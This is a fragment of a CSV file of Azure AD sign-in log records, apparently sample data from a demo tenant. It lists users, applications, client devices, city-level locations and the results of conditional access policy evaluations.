+968,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:01.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,55edbcbe-b2c9-46cb-a19b-8186bdd74ec4,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",1fc6d415-116e-44c9-a4fc-b8ef896b1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,1fc6d415-116e-44c9-a4fc-b8ef896b1300,SigninLogs,Sucess,38.73078156,-78.17196655
+969,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:23.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0c52f28e-0b5c-4e98-959c-95e67c2e07fe,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",f81997e3-0b26-42cc-8532-c4de867d1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,f81997e3-0b26-42cc-8532-c4de867d1500,SigninLogs,Sucess,33.7984581,-84.38828278
+970,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:33.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b02e3e55-34a0-4c8e-adc1-2f4b68964a07,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",f81997e3-0b26-42cc-8532-c4def77e1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,f81997e3-0b26-42cc-8532-c4def77e1500,SigninLogs,Sucess,33.7984581,-84.38828278
+971,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:22.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,73cc469f-b0ea-0000-5683-4f44740c01be,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",37105d23-9607-4aeb-a84b-5fa3a3941400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,37105d23-9607-4aeb-a84b-5fa3a3941400,SigninLogs,Sucess,41.90428925,-85.99833679
+972,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:20.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,79975a62-f155-42eb-b935-1b57e2c4a934,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c0245186-29e3-436a-add4-db49bdbd1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,c0245186-29e3-436a-add4-db49bdbd1300,SigninLogs,Sucess,41.90428925,-85.99833679
+973,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:04.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6003d7eb-abc7-4481-b898-49a09f3619b6,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",669c457e-4441-4eab-88a8-07b7b6e91600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,669c457e-4441-4eab-88a8-07b7b6e91600,SigninLogs,Sucess,33.7984581,-84.38828278
+974,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:10.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4ed1469f-2079-0000-4704-aa5ec6fb1908,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",669c457e-4441-4eab-88a8-07b792ea1600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,669c457e-4441-4eab-88a8-07b792ea1600,SigninLogs,Sucess,33.7984581,-84.38828278
+975,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:48.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2a5801ef-7f8b-4e7a-ba82-1e56991e8748,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",669c457e-4441-4eab-88a8-07b766ef1600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,669c457e-4441-4eab-88a8-07b766ef1600,SigninLogs,Sucess,33.7984581,-84.38828278
